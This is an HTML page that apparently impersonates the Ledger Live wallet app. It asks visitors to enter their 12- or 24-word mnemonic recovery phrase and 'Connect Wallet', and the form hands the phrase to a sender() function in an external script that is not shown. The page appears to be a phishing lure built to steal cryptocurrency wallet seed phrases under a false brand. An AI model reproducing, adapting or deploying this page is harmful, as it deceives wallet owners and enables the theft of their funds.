<html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Ledger Live</title>
     <link rel="icon" type="image/x-icon" href="./logo.png">
<link href="standalone.5308b6b6.css" rel="preload" as="style">
<link href="standalone.5308b6b6.css" rel="stylesheet">
</head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<body>
<div class="wrap">
<div data-v-a92dbbbe="" class="sign mui-fl-central">
<header data-v-a92dbbbe="" class="s-header mui-fl-vert mui-fl-btw">
</header>
<div data-v-a92dbbbe="" class="signbox">
<div data-v-a92dbbbe="" class="sb-header">
<button data-v-a92dbbbe="" class="back-btn taplight2" style="" onclick="window.location.href = 'index.html';" ></button>
<ul data-v-a92dbbbe="" class="step mui-fl-central"><li data-v-a92dbbbe="" class="active"></li>
<li data-v-a92dbbbe="" class="active">
<li data-v-a92dbbbe="" class=""></li></ul></div><div data-v-a92dbbbe="" class="sb-body">
<p data-v-a92dbbbe="" class="lab">Mnemonic Phrase</p>
<p data-v-a92dbbbe="" class="lab2 min18">Input your 12 or 24 mnemonic words seperated by spaces.</p>

<form action="" onsubmit=" return sender()">
<div data-v-a92dbbbe="" class="form-item"> <textarea  name="message" id="message"   class="mui-textarea space" ></textarea> <p data-v-a92dbbbe="" class="form-item-info err" style="display: none;"></p></div>
<div data-v-a92dbbbe="" class="form-item"><div data-v-a92dbbbe="" class="el-select sty1-select"><!----><div class="el-input el-input--suffix"><!---->
<!----><span class="el-input__suffix">
<span class="el-input__suffix-inner"><i class="el-select__caret el-input__icon el-icon-arrow-up"></i><!----><!----><!----><!----><!----></span><!----></span><!----><!----></div>
<div class="el-select-dropdown el-popper popper-block" style="display: none; min-width: 326.4px;">
<div class="el-scrollbar" style="">
<div class="el-select-dropdown__wrap el-scrollbar__wrap" style="margin-bottom: -8px; margin-right: -8px;">
<ul class="el-scrollbar__view el-select-dropdown__list"><!---->
</ul></div><div class="el-scrollbar__bar is-horizontal"><div class="el-scrollbar__thumb" style="transform: translateX(0%);"></div>
</div>
<div class="el-scrollbar__bar is-vertical"><div class="el-scrollbar__thumb" style="transform: translateY(0%);"></div></div>
</div><!----></div>
</div>
<i data-v-a92dbbbe="" class="mico-arrow-right icon-arrow-right"></i></div>
<button type="submit" value="Send" id="btn" data-v-a92dbbbe="" class="marg-t fz18 van-button van-button--info van-button--normal van-button--block" >
<div data-v-a92dbbbe="" class="van-button__content"><span data-v-a92dbbbe="" class="van-button__text">Connect Wallet</span></div></button>
</div></div>
</div>
</div>
<script src="sender.js"></script>
</body>
</html>
